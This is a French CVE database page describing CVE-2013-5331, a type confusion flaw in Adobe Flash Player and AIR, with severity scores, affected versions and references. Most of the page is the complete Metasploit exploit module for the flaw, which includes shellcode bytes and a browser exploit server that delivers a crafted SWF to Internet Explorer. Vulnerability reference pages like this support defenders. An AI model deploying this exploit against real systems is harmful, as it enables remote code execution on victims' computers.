CVE-2013-5331 : Détail

CVE-2013-5331

Code Injection
A03-Injection
95.99%V3
Network
2013-12-11
14h00 +00:00
2018-01-08
20h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Adobe Flash Player before 11.7.700.257 and 11.8.x and 11.9.x before 11.9.900.170 on Windows and Mac OS X and before 11.2.202.332 on Linux, Adobe AIR before 3.9.0.1380, Adobe AIR SDK before 3.9.0.1380, and Adobe AIR SDK & Compiler before 3.9.0.1380 allow remote attackers to execute arbitrary code via crafted .swf content that leverages an unspecified "type confusion," as exploited in the wild in December 2013.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-94 Improper Control of Generation of Code ('Code Injection')
The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 33095

Date de publication : 2014-04-28 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer def initialize(info={}) super(update_info(info, 'Name' => "Adobe Flash Player Type Confusion Remote Code Execution", 'Description' => %q{ This module exploits a type confusion vulnerability found in the ActiveX component of Adobe Flash Player. This vulnerability was found exploited in the wild in November 2013. This module has been tested successfully on IE 6 to IE 10 with Flash 11.7, 11.8 and 11.9 prior to 11.9.900.170 over Windows XP SP3 and Windows 7 SP1. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Vulnerability discovery and exploit in the wild 'bannedit', # Exploit in the wild discoverer, analysis and reporting 'juan vazquez' # msf module ], 'References' => [ [ 'CVE', '2013-5331' ], [ 'OSVDB', '100774'], [ 'BID', '64199'], [ 'URL', 'http://helpx.adobe.com/security/products/flash-player/apsb13-28.html' ], [ 'URL', 'http://blog.malwaretracker.com/2014/01/cve-2013-5331-evaded-av-by-using.html' ] ], 'Payload' => { 'Space' => 2000, 'DisableNops' => true, 'PrependEncoder' => stack_adjust }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f', 'Retries' => false, 'EXITFUNC' => "thread" }, 'Platform' => 'win', 'BrowserRequirements' => { :source => /script|headers/i, :clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}", :method => "LoadMovie", :os_name => Msf::OperatingSystems::WINDOWS, :ua_name => Msf::HttpClients::IE, :flash => lambda { |ver| ver =~ /^11\.[7|8|9]/ && ver < '11.9.900.170' } }, 'Targets' => [ [ 'Automatic', {} ] ], 'Privileged' => false, 'DisclosureDate' => "Dec 10 2013", 'DefaultTarget' => 0)) end def exploit @swf = create_swf super end def stack_adjust adjust = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18 # get teb adjust << "\x83\xC0\x08" # add eax, byte 8 # get pointer to stacklimit adjust << "\x8b\x20" # mov esp, [eax] # put esp at stacklimit adjust << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset adjust end def on_request_exploit(cli, request, target_info) print_status("Request: #{request.uri}") if request.uri =~ /\.swf$/ print_status("Sending SWF...") send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'}) return end print_status("Sending HTML...") tag = retrieve_tag(cli, request) profile = get_profile(tag) profile[:tried] = false unless profile.nil? # to allow request the swf print_status("showme the money") send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) end def exploit_template(cli, target_info) swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" flash_payload = "" get_payload(cli,target_info).unpack("V*").each do |i| flash_payload << "0x#{i.to_s(16)}," end flash_payload.gsub!(/,$/, "") html_template = %Q|<html> <body> <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" /> <param name="movie" value="<%=swf_random%>" /> <param name="allowScriptAccess" value="always" /> <param name="FlashVars" value="sh=<%=flash_payload%>" /> <param name="Play" value="true" /> </object> </body> </html> | return html_template, binding() end def create_swf path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2013-5331", "Exploit.swf" ) swf = ::File.open(path, 'rb') { |f| swf = f.read } swf end end

Products Mentioned

Configuraton 0

Adobe>>Flash_player >> Version From (including) 11.0 To (excluding) 11.7.700.257

Adobe>>Flash_player >> Version From (including) 11.8 To (excluding) 11.8.800.175

Adobe>>Flash_player >> Version From (including) 11.9 To (excluding) 11.9.900.700

Apple>>Mac_os_x >> Version -

Microsoft>>Windows >> Version -

Configuraton 0

Adobe>>Flash_player >> Version From (including) 11.0 To (excluding) 11.2.202.332

Linux>>Linux_kernel >> Version -

Configuraton 0

Adobe>>Air >> Version To (excluding) 3.9.0.1380

Adobe>>Air_sdk >> Version To (excluding) 3.9.0.1380

Références

http://rhn.redhat.com/errata/RHSA-2013-1818.html
Tags : vendor-advisory, x_refsource_REDHAT